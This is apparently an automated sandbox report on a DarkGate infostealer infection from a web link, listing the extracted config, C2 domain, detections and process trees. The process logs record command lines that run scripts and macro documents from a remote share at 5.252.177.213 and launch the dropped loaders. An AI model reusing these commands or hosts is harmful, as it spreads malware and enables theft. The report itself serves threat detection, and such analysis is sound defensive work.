darkgate | hxxps://t8n[.]net/03_march_2024_100730[.]html

Analysis

max time kernel
300s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
05-03-2024 15:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://t8n.net/03_march_2024_100730.html

Score

10^/10

darkgate admin888 dave stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

afdhf198jfadafdkfad.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
lrDcZuOq
minimum_disk
50
minimum_ram
7000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 6 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5312-92-0x0000000005D60000-0x00000000060AF000-memory.dmp	family_darkgate_v6
behavioral1/memory/5312-93-0x0000000005D60000-0x00000000060AF000-memory.dmp	family_darkgate_v6
behavioral1/memory/3016-119-0x0000000006050000-0x000000000639F000-memory.dmp	family_darkgate_v6
behavioral1/memory/3016-120-0x0000000006050000-0x000000000639F000-memory.dmp	family_darkgate_v6
behavioral1/memory/4976-133-0x0000000004260000-0x0000000005230000-memory.dmp	family_darkgate_v6
behavioral1/memory/4976-135-0x0000000005750000-0x0000000005A9F000-memory.dmp	family_darkgate_v6

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exe

flow pid process

97 3312 WScript.exe
100 3312 WScript.exe

flow	pid	process
97	3312	WScript.exe
100	3312	WScript.exe

Dave packer 2 IoCs

Detects executable using a packer named 'Dave' by the community, based on a string at the end.

dave

Processes:

resource	yara_rule
C:\Users\Public\d0.exe	dave
C:\Users\Public\d0.exe	dave

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeCScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation	CScript.exe

Executes dropped EXE 6 IoCs

Processes:

d0.exeAutoit3.exed0.exeAutoit3.exed0.exeAutoit3.exe

pid process

1920 d0.exe
5312 Autoit3.exe
2744 d0.exe
3016 Autoit3.exe
5452 d0.exe
4976 Autoit3.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1920	d0.exe
5312	Autoit3.exe
2744	d0.exe
3016	Autoit3.exe
5452	d0.exe
4976	Autoit3.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Autoit3.exeAutoit3.exeWINWORD.EXEEXCEL.EXEAutoit3.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEchrome.exeEXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133541249676919979"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 22 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\CachedOfflineAvailable = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\CachedOfflineAvailableTime = "240623312"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = bb000000b500bbaf933ba7000400000000002d000000315350537343e50abe43ad4f85e469dc8633986e110000000b000000000b000000ffff000000000000490000003153505330f125b7ef471a10a5f102608c9eebac2d0000000a000000001f0000000e00000035002e003200350032002e003100370037002e003200310033000000000000002d000000315350533aa4bddeb337834391e74498da2995ab1100000003000000001300000000000000000000000000000000000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f580d1a2cf021be504388b07367fc96ef3c0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 3000c301c55c5c352e3235322e3137372e3231335c7368617265004d6963726f736f6674204e6574776f726b000002000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

5520 EXCEL.EXE
2236 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

chrome.exechrome.exe

pid process

4632 chrome.exe
4632 chrome.exe
5220 chrome.exe
5220 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

4632 chrome.exe
4632 chrome.exe
4632 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe
Token: SeShutdownPrivilege	4632	chrome.exe
Token: SeCreatePagefilePrivilege	4632	chrome.exe

Suspicious use of FindShellTrayWindow 28 IoCs

Processes:

chrome.exeEXCEL.EXE

pid	process
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
5520	EXCEL.EXE
5520	EXCEL.EXE

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe
4632	chrome.exe

Suspicious use of SetWindowsHookEx 25 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid	process
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
2236	WINWORD.EXE
2236	WINWORD.EXE
2236	WINWORD.EXE
2236	WINWORD.EXE
2236	WINWORD.EXE
2236	WINWORD.EXE
2236	WINWORD.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE
5520	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4632 wrote to memory of 2068	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 2068	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 4416	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3256	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3256	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe
PID 4632 wrote to memory of 3768	4632	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://t8n.net/03_march_2024_100730.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa7fdb9758,0x7ffa7fdb9768,0x7ffa7fdb9778
2⤵
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:2
2⤵
PID:4416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:8
2⤵
PID:3256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:8
2⤵
PID:3768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3028 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:1
2⤵
PID:3312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:1
2⤵
PID:412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4920 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:8
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:8
2⤵
PID:4572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5252 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:1
2⤵
PID:3904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4800 --field-trial-handle=1864,i,15451522357528780027,15687828604371240857,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5220

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\5.252.177.213\share\setup.js"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:3312

C:\users\public\d0.exe
"C:\users\public\d0.exe"
2⤵
- Executes dropped EXE
PID:1920

\??\c:\temp\Autoit3.exe
"c:\temp\Autoit3.exe" c:\temp\script.a3x
3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:5312

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\5.252.177.213\share\setup.js"
1⤵
- Checks computer location settings
PID:5824

C:\users\public\d0.exe
"C:\users\public\d0.exe"
2⤵
- Executes dropped EXE
PID:2744

\??\c:\temp\Autoit3.exe
"c:\temp\Autoit3.exe" c:\temp\script.a3x
3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3016

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "\\5.252.177.213\share\setup.js"
1⤵
- Checks computer location settings
PID:3324

C:\users\public\d0.exe
"C:\users\public\d0.exe"
2⤵
- Executes dropped EXE
PID:5452

\??\c:\temp\Autoit3.exe
"c:\temp\Autoit3.exe" c:\temp\script.a3x
3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4976

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5716

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\5.252.177.213\share\in.js"
1⤵
PID:6020

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "\\5.252.177.213\share\in.js"
1⤵
PID:3164

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "\\5.252.177.213\share\1.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5520

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:5252

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "\\5.252.177.213\share\1.dotm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:5360

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\chdhhdc\edabkca
Filesize
1KB

MD5
dd020146998a417deb4a258e23ae1eb4

SHA1
